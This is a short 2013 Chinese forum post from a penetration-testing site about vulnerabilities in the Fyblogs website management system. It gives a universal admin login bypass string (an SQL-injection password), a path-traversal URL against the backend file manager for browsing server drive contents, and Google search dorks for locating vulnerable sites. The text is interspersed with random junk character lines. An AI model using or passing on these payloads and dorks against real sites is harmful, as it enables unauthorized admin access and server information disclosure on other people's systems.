中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-14 20:17
标题:
Fyblogs网站管理系统漏洞
后台万能密码 'or'='or'
; I1 `' c: |* B, ], Z
2 L/ I# c5 k/ M/ ]# ?* b
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
9 M/ {3 Y# ^+ d7 r' t5 o
admin/uploadfile.asp?currentFolder=/upfiles/../
- I9 ?1 J3 Y! n3 D, q
" R0 |% x) s& G" o1 r6 ?
漏洞证明:
- _6 f: g" }8 G4 M! q
0 d: }0 Y( y& v9 C$ h$ r
谷歌:inurl:type.asp?id=1 新闻中心
9 p5 t2 D; z; Y( B
或者 :inurl:download_ok.asp?
- T1 ?1 X5 t% m
8 Q% ?/ Z9 g2 H( T# @1 e
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2